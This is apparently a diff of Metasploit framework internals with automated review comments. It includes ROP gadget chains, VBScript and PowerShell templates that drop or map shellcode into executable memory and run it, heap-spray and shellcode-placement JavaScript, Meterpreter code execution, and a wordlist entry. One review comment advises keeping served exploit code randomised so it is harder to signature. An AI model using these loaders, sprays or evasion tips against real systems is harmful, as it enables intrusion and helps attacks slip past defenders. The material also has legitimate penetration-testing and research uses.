i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
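Review bot: `packet_enum_tlvs` ends with `raise StopIteration()`, which is redundant in a generator and, under PEP 479 (Python 3.7 and later), is turned into a `RuntimeError` in the caller instead of ending iteration; delete that line and let the function fall off the end of the loop. `tlv_type == None` should be `tlv_type is None`. `struct.unpack('>II', pkt[offset:offset+8])` raises `struct.error` when fewer than 8 bytes remain in a malformed packet; `packet_get_tlv`, whose body starts above the hunk, should be checked so the two walkers fail the same way.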

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.


@ -11,7 +11,7 @@
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@ -40,7 +40,7 @@
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>


@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget>
<gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>


@ -8,7 +8,7 @@
<gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="0xFFFFFBFF">0xFFFFFBFF -> ebx</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>


@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 26
https://metasploit.com:443
END


@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
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
K 8
failures
V 1
8
K 15
svn:realmstring
V 30
https://www.metasploit.com:443
END


@ -1,5 +1,5 @@
Function %{var_func}()
%{var_shellcode}
%{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes}
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")


@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }


@ -1,5 +1,6 @@
aspnet_client/
Autodiscover/
exchange/
ecp/
EWS/
Microsoft-Server-ActiveSync/


@ -1,3 +1,4 @@
/AdapterFramework/version/version.jsp
/AdobeDocumentServices/Config
/AdobeDocumentServices/Config?wsdl
/AE/index.jsp
@ -319,6 +320,7 @@
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
/webdynpro/dispatcher/sap.com/tc~wd~tools
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer


@ -92,6 +92,7 @@ root
router
rw
rwa
s!a@m#n$p%c
san-fran
sanfran
scotty


@ -32,50 +32,62 @@ module Auxiliary::JohnTheRipper
)
@run_path = nil
@john_path = ::File.join(Msf::Config.install_root, "data", "john")
@john_path = ::File.join(Msf::Config.data_directory, "john")
autodetect_platform
end
# @return [String] the run path instance variable if the platform is detectable, nil otherwise.
def autodetect_platform
cpuinfo_base = ::File.join(Msf::Config.install_root, "data", "cpuinfo")
return @run_path if @run_path
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
if File.directory?(cpuinfo_base)
data = nil
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
fname = "#{cpuinfo_base}/cpuinfo.exe"
if File.exists?(fname) and File.executable?(fname)
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
end
end
@run_path
return @run_path
end
def john_session_id
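Review bot: The three `%x{"#{fname}"}` calls in the new autodetect_platform body still hand the path to a shell, so a data directory containing a double quote, `$(` or a backtick would be interpreted rather than treated as a filename; `data = IO.popen([fname], &:read) rescue nil` runs the helper directly with no shell in between. `File.exists?` on the three new guards is the deprecated spelling of `File.exist?`. The Linux branches `chmod 0755` and execute the cpuinfo binary on existence alone, while the Windows branch also requires `File.executable?`; if `Msf::Config.data_directory` can be written by another local user this is code execution as the framework user, which deserves a comment such as `# executes a helper shipped in data/: keep data_directory out of world-writable locations`. The `rescue nil` modifiers also hide every failure mode, so a missing loader or non-zero exit silently falls through to the `any` build, and the x86_64 `else` arm falls back to the 32-bit `run.linux.x86.any/john`, presumably because no x64 `any` build is shipped.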


@ -23,7 +23,7 @@ module Auxiliary::MimeTypes
end
def mime_load_extension_map
path = File.join( Msf::Config.install_root, "data", "mime.yml")
path = File.join( Msf::Config.data_directory, "mime.yml")
@extension_map = YAML.load_file(path)
end
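Review bot: `YAML.load_file(path)` on the new line deserializes `mime.yml` with full Psych tag support, so anyone who can write into `Msf::Config.data_directory` can instantiate arbitrary Ruby objects inside the framework process; the file ships with the framework, so this is a hardening point rather than a live bug. Where the installed Psych provides it, `@extension_map = YAML.safe_load(File.read(path))` restricts the parse to plain hashes, strings and numbers, which is all an extension map needs (I cannot tell from this hunk whether the repo's minimum Ruby offers `safe_load`). Failing that, a comment on the call such as `# trusted data file: full YAML load, keep mime.yml out of user-writable paths` would at least record the assumption.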


@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri'
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/openvas_nokogiri'
require 'rex/parser/wapiti_nokogiri'
require 'rex/parser/outpost24_nokogiri'
# Legacy XML parsers -- these will be converted some day
require 'rex/parser/ip360_aspl_xml'
@ -2926,7 +2927,7 @@ class DBManager
# Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
# :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
# :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
# :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml
# :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
# If there is no match, an error is raised instead.
def import_filetype_detect(data)
@ -3059,6 +3060,9 @@ class DBManager
@import_filedata[:type] = "CI"
return :ci_xml
end
when "main"
@import_filedata[:type] = "Outpost24 XML"
return :outpost24_xml
else
# Give up if we haven't hit the root tag in the first few lines
break if line_count > 10
@ -3649,7 +3653,7 @@ class DBManager
data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)}
wspace = args[:wspace] || args['wspace'] || workspace
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf")
basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf")
allow_yaml = false
btag = nil
@ -5923,6 +5927,36 @@ class DBManager
parser.parse(args[:data])
end
def import_outpost24_xml(args={}, &block)
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
wspace = args[:wspace] || workspace
if Rex::Parser.nokogiri_loaded
parser = "Nokogiri v#{::Nokogiri::VERSION}"
noko_args = args.dup
noko_args[:blacklist] = bl
noko_args[:wspace] = wspace
if block
yield(:parser, parser)
import_outpost24_noko_stream(noko_args) {|type, data| yield type,data}
else
import_outpost24_noko_stream(noko_args)
end
return true
else # Sorry
raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.")
end
end
def import_outpost24_noko_stream(args={},&block)
if block
doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data }
else
doc = Rex::Parser::Outpost24Document.new(args,self)
end
parser = ::Nokogiri::XML::SAX::Parser.new(doc)
parser.parse(args[:data])
end
def unserialize_object(xml_elem, allow_yaml = false)
return nil unless xml_elem
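Review bot: In `import_filetype_detect` the new `when "main"` arm classifies any XML whose first element is `<main>` as an Outpost24 report, a much weaker signature than the vendor-specific root tags of the neighbouring arms, so an unrelated file with that root is handed to `import_outpost24_xml` and fails late inside the SAX parser instead of raising the "no match" error. If the Outpost24 schema carries a distinguishing attribute or namespace on `<main>`, matching on that before returning `:outpost24_xml` would avoid the misclassification. In `import_outpost24_xml` the workspace lookup is `args[:wspace] || workspace`, whereas the importer in the `basedir` hunk above also accepts the string key `args['wspace']`; a caller passing string keys would silently import into the default workspace, so `wspace = args[:wspace] || args['wspace'] || workspace` keeps the two consistent. The enclosing `DBManager` class starts and ends outside these hunks.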

lib/msf/core/encoded_payload.rb Executable file → Normal file


@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
], self.class)
end


@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
], self.class)
end


@ -0,0 +1,27 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end


@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
], self.class)
end


@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
], self.class)
end


@ -47,19 +47,18 @@ module Exploit::FileDropper
false
end
else
cmds = [
win_cmds = [
%Q|attrib.exe -r "#{win_file}"|,
%Q|del.exe /f /q "#{win_file}"|,
%Q|rm -f "#{file}" >/dev/null|,
]
%Q|del.exe /f /q "#{win_file}"|
]
# We need to be platform-independent here. Since we can't be
# certain that {#target} is accurate because exploits with
# automatic targets frequently change it, we just go ahead and
# run both a windows and a unixy command in the same line. One
# of them will definitely fail and the other will probably
# succeed. Doing it this way saves us an extra round-trip.
session.shell_command_token(cmds.join(" ; "))
# Trick shared by @mihi42
session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
print_good("Deleted #{file}")
true
end
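Review bot: `del.exe /f /q "#{win_file}"` in the new `win_cmds` array names a binary that does not exist: `del` is an internal command of cmd.exe, so on a Windows shell that step fails with "'del.exe' is not recognized" and the file survives even though `print_good("Deleted #{file}")` is still printed unconditionally; the fix is `%Q|del /f /q "#{win_file}"|`. The combined command also ends the Windows segment with `>/dev/null`, which cmd.exe will likely treat as a redirect to the path `\dev\null` and fail on, though that failure is harmless. Both `file` and `win_file` are spliced into the line with only double-quote wrapping, so a registered path containing `"`, `$` or a backtick breaks the quoting; this predates the commit but is worth a comment on the array. The enclosing method starts before this hunk.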


@ -3,6 +3,7 @@ require 'rex/service_manager'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/encryptjs'
require 'rex/exploitation/heaplib'
require 'rex/exploitation/js'
module Msf
@ -677,6 +678,14 @@ protected
OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]),
], Exploit::Remote::HttpServer::HTML)
# Cache Javascript
@cache_base64 = nil
@cache_ajax_download = nil
@cache_mstime_malloc = nil
@cache_property_spray = nil
@cache_heap_spray = nil
@cache_os_detect = nil
end
#
@ -708,146 +717,7 @@ protected
end
def js_base64
js = <<-ENDJS
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\\r\\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};
ENDJS
opts = {
'Symbols' => {
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
@cache_base64 ||= Rex::Exploitation::Js::Utils.base64
end
@ -870,34 +740,7 @@ protected
# </script>
#
def js_ajax_download
%Q|function ajax_download(oArg) {
method = oArg.method;
path = oArg.path;
data = oArg.data;
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}
|
@cache_ajax_download ||= Rex::Exploitation::Js::Network.ajax_download
end
@ -933,39 +776,7 @@ protected
# </script>
#
def js_mstime_malloc
%Q|
function mstime_malloc(oArg) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
buf = "";
for (i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";##{Rex::Text.rand_text_hex(6)}";
}
}
e = document.getElementById(objId);
if (e == null) {
eleId = "#{Rex::Text.rand_text_alpha(5)}"
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}
|
@cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc
end
#
@ -984,90 +795,22 @@ protected
#
# Example of using the 'sprayHeap' function:
# <script>
# #{spray}
# #{js_property_spray}
#
# var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444");
# sprayHeap({shellcode:s, heapBlockSize:0x80000});
# </script>
#
def js_property_spray
sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
js = %Q|
var #{sym_div_container};
function sprayHeap( oArg ) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
maxAllocs = oArg.maxAllocs;
objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
#{sym_div_container} = document.getElementById(objId);
if (#{sym_div_container} == null) {
#{sym_div_container} = document.createElement("div");
}
#{sym_div_container}.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
#{sym_div_container}.appendChild(obj);
}
}
|
@cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray
end
def js_heap_spray
js = %Q|var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}
|
opts = {
'Symbols' => {
'Variables' => %w{ shellcode retSlide payLoadSize memory index
heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize
heapBlockCnt },
'Methods' => %w{ sprayHeap }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
@cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray
end
def js_os_detect
return ::Rex::Exploitation::JavascriptOSDetect.new
@cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
end
# Transmits a html response to the supplied client
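Review bot: Memoising the helpers into `@cache_*` instance variables changes a property the removed bodies had: `js_property_spray` drew a fresh `sym_div_container` with `Rex::Text.rand_text_alpha` on every call, `js_mstime_malloc` embedded `Rex::Text.rand_text_hex(6)` and a random element id at render time, and `js_base64`/`js_heap_spray` ran `ObfuscateJS` per call, so each served page carried different identifiers. With `@cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray` and its siblings, every client of one module instance now receives byte-identical JavaScript for the lifetime of that instance, which makes the served content easier to signature; I cannot see whether the new `Rex::Exploitation::Js` helpers randomise internally, so this is worth confirming. If per-response variation is wanted, drop the `||=` on the helpers that randomise, otherwise document the trade-off with `# cached per module instance: identical JS is served to every client`.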


@ -51,7 +51,7 @@ module Exploit::Java
# Instantiate the JVM with a classpath pointing to the JDK tools.jar
# and our javatoolkit jar.
classpath = File.join(Msf::Config.install_root, "data", "exploits", "msfJavaToolkit.jar")
classpath = File.join(Msf::Config.data_directory, "exploits", "msfJavaToolkit.jar")
classpath += ":" + toolsjar
